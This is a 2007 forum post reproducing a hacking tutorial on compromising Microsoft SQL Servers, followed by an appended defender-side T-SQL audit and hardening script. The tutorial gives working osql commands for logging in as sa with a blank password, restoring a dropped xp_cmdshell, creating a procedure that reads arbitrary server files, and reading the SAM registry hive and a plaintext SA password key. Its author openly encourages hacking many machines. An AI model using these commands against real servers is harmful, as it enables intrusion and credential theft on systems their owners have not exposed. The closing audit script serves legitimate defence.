Gonzalez Posted July 4, 2007

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ This is a little disclaimer for if you haven't read the one on our site.
+ The tools and tutorials KD-Team develops and publishes are meant for
+ educational purposes only. WE DO NOT encourage the use of these tools and
+ tutorials for malicious purposes. We learned a lot during the development of them,
+ so we hope you also learn and don't just use it without any brains.
+ We take completely NO responsibility for any damage caused by them, nor
+ are we or our ISP responsible for what you do with them.
+ Greetz: KD-Team
+ http://www.kd-team.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

*********************************************************************************
* Hacking Secured SQL Servers
* Tutorial Written By: kd-team
* Creditz: Swiv, www.google.com, www.sqlsecurity.com
*
* Use at your own risk.
* All the things in here will only work if the corresponding .dll files exist and are original.
*********************************************************************************

0) Index
1) Tools Needed
2) The Easiest Way
3) Restoring xp_cmdshell
4) Reading almost any file on server
5) Reading The Registry
6) Final Words

0) Index

This tutorial is intended as a guide to hack the secured sql servers, concentrating on the
well-known SQL_ERROR response. This means:
- Hack sql servers that have only got a normal user pass
- Hack sql servers where the stored procedure xp_cmdshell has been disabled
This DOESN'T mean:
- Hack sql servers where the .dll has been changed or switched with another one.
- Explaining how to bruteforce sql server accounts

Hope this tutorial is of any use to those who want to hack more things or just want to know things.
Plz bitch about this tut if things don't work, but don't start bitching that it is too slow
to hack more than 10 machines a day.
I also want to thank Swiv for his time to answer my questions and for his portion of contribution to this
tutorial.

1) Tools Needed

- A server with port 1433 open and the correct username/password
- osql.exe
- sqlexec.exe written by sunx (the one that has the green apple as icon)
ALSO keep in mind that all of the given commands only work if they are enabled, else it will fail.

*********************************************************************************

2) The Easiest Way

First of all make sure you use the correct sqlexec version and not "sqlexec for nethacker 1.0".
So use the sqlexec.exe that has a green apple as icon.
When opening it has a very simple interface and only 1 thing that "sqlexec for nethacker 1.0" hasn't got:
that is the format field. In that combobox (that is empty when opening the app) you can select 4 ways
of sending the data to the sql server.
The options:
1 xp_cmdshell "%s"
2 select * from openrowset etc
3 create procedure #proc_temp etc
4 %s
Option 1 is the same as in "sqlexec for nethacker 1.0". So when "sqlexec for nethacker 1.0" gives a
SQL_ERROR this app will do also, BUT when selecting option 2 most of the time you will be able to hack
the server in the normal way.

*********************************************************************************

3) Restoring xp_cmdshell

Restoring xp_cmdshell seems like a difficult task but in fact it is easy.
First of all, this only works when the stored procedure xp_cmdshell is dropped; if the .dll has been changed
then it won't work.
This is only intended for when the easy way doesn't work, but most of the time it does.
Put the following in a .txt (example: restore.txt) and save it in the same directory as osql.exe is:
//////////////////////////////////////////////////////////////////////////////////
use master
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
go
//////////////////////////////////////////////////////////////////////////////////
The above path depends on the installation of MSSQL so it can be different under some circumstances.
When done execute osql.exe like this:
osql.exe -S 123.123.123.123 -U sa -P "" -i restore.txt
Now if everything went how it is supposed to go, xp_cmdshell is enabled again and you can use option
1 from sqlexec or the other app to hack the machine.
If you want to view all stored procedures on the server currently in your power, execute osql like:
osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_stored_procedures"
Keep in mind that this also has got procedures made by an admin and maybe hasn't got the standard ones.

*********************************************************************************

4) Reading almost any file on server

I say any because sometimes when the file is too big it refuses to read it. It also refuses to read when
the file is in use.
First of all check if the file is on the server before attempting to read it; for that execute osql like:
osql.exe -S 123.123.123.123 -U sa -P "" -Q "xp_getfiledetails 'c:\winnt\system32\net.exe'"
If the file exists it will give back some numbers meaning filesize, date etc.
When the response was a positive report, put the following in a .txt (example: read.txt) and make sure it
is in the same folder as osql.exe:
////////////////////////////////////////////////////////
Create proc sp_readTextFile @filename sysname
as
begin
set nocount on
Create table #tempfile (line varchar(8000))
exec ('bulk insert #tempfile from "' + @filename + '"')
select * from #tempfile
drop table #tempfile
End
go
////////////////////////////////////////////////////////
When done execute osql.exe like this:
osql.exe -S 123.123.123.123 -U sa -P "" -i read.txt
You have now successfully created a stored procedure to read files. Now how do you read files with it?
Very simple, use osql.exe like this:
osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_readTextFile 'C:\winnt\system32\drivers\etc\services'" -o c:\breadfile.txt
Then just browse to your local C: and there you will find the file. Only problem is there will be a lot
of white stripes and "-" characters; that is the normal sql output way, I can't do anything about that.

*********************************************************************************

5) Reading The Registry

Reading the registry can be handy when there is valuable information stored in it like passwords or
usernames.
I'll give a little example on how to read the sam file; just take 1 note: even if you read the sam file on
a win2k machine it is useless because of the standard security it has. What you can do with
registry reading will be explained later.
Fire up osql.exe and execute it like this:
osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'"
And in this key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5
the password of the SA user is stored in plain text. Could be handy if you hack a machine that has sql
running and the hack has got no super user rights, like the IISMEDIA exploit; then just grab the sql pass
from the registry.

*********************************************************************************

6) Final Words

Hope this has been of some help. I can give NO guarantee everything in here will work under different
circumstances. But all critics are welcome.
Further I have spent some time investigating all this and trying to explain it in as simple a way as possible,
so I say again don't bitch if this ain't good enough for mass-hacking.
For the rest keep learning and finding out things peeps. Hacking is something you gotta feel.
Don't be lame, don't be lazy, try things yourself, it really pays back.
1 final note:
I did not give scenarios and solutions on purpose. I hope that with the info that is in this paper
you all will have enough imagination to hack something with it. Maybe later on I will make a scenario
and solutions paper about this.
Greetz,
kd-team
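A defender-side counterpart to the post above, added here as an editorial example and not part of the original post or of KD-Team's tools: a T-SQL audit and hardening script that checks the same weaknesses the tutorial depends on (a blank sa password used with -U sa -P "", xp_cmdshell enabled or re-registered through sp_addextendedproc, ad hoc OPENROWSET queries, and file or registry reads via BULK INSERT and xp_regread by logins that are not sysadmin). It assumes SQL Server 2005 or later, where xp_cmdshell and ad hoc queries are sp_configure options and the sys.* catalog views exist; the post's own commands (xplog70.dll, osql.exe) target SQL Server 2000, where the only control over xp_cmdshell was dropping the procedure, which section 3 shows is trivially undone. The login name used when renaming sa is a placeholder.

```sql
-- Editorial example: audit and hardening for the weaknesses used in this
-- tutorial. Assumes SQL Server 2005 or later (catalog views and the
-- sp_configure options below do not exist on SQL Server 2000).
-- Run as a sysadmin, e.g.:  sqlcmd -S <server> -E -i audit.sql

USE master;
GO

-- 1) Blank or trivial sa password (the tutorial logs in with -U sa -P "").
--    PWDCOMPARE checks a candidate clear-text password against the stored hash.
SELECT name, is_disabled,
       CASE WHEN PWDCOMPARE('',   password_hash) = 1 THEN 'BLANK PASSWORD'
            WHEN PWDCOMPARE('sa', password_hash) = 1 THEN 'PASSWORD = sa'
            ELSE 'ok' END AS password_check
FROM sys.sql_logins
WHERE name = 'sa' OR principal_id = 1;

-- 2) Command execution and ad hoc remote queries (sqlexec options 1 and 2).
--    value_in_use = 1 means the feature is live right now.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ad Hoc Distributed Queries');

-- 3) Extended stored procedures backed by a DLL, which is where an
--    xp_cmdshell re-added with sp_addextendedproc (section 3) would show up.
--    Review every row: dll_name should name only DLLs shipped with the
--    instance, located in the instance's Binn directory.
SELECT name, dll_name
FROM sys.extended_procedures
ORDER BY name;

-- 4) Who can read arbitrary files with BULK INSERT (section 4) or the
--    registry with xp_regread (section 5) without being an administrator.
SELECT r.name AS server_role, m.name AS member_login
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('bulkadmin', 'sysadmin');

SELECT o.name AS procedure_name, p.permission_name, p.state_desc,
       USER_NAME(p.grantee_principal_id) AS grantee
FROM sys.database_permissions p
JOIN sys.all_objects o ON o.object_id = p.major_id
WHERE o.name IN ('xp_cmdshell', 'xp_regread', 'xp_getfiledetails');
GO

-- Hardening. Every statement is reversible; apply them only after checking
-- the results above against what the applications on this instance need.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;                 -- closes sqlexec option 1
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;  -- closes option 2 (OPENROWSET)
RECONFIGURE;

-- Stop ordinary logins from reading the registry through the server.
REVOKE EXECUTE ON xp_regread TO public;

-- Rename and disable sa so the tutorial's hard-coded login fails outright.
-- Create a separate, named sysadmin login for administrators first.
ALTER LOGIN sa WITH NAME = [sa_disabled_placeholder];   -- placeholder name
ALTER LOGIN [sa_disabled_placeholder] DISABLE;
GO
```

The audit queries are the part worth scheduling: a row in sys.extended_procedures whose dll_name sits outside the Binn directory, or xp_cmdshell flipping back to 1 in sys.configurations, is exactly the trace that section 3 of the post leaves behind, and diffing these result sets against a known-good baseline turns the tutorial's technique into an alert.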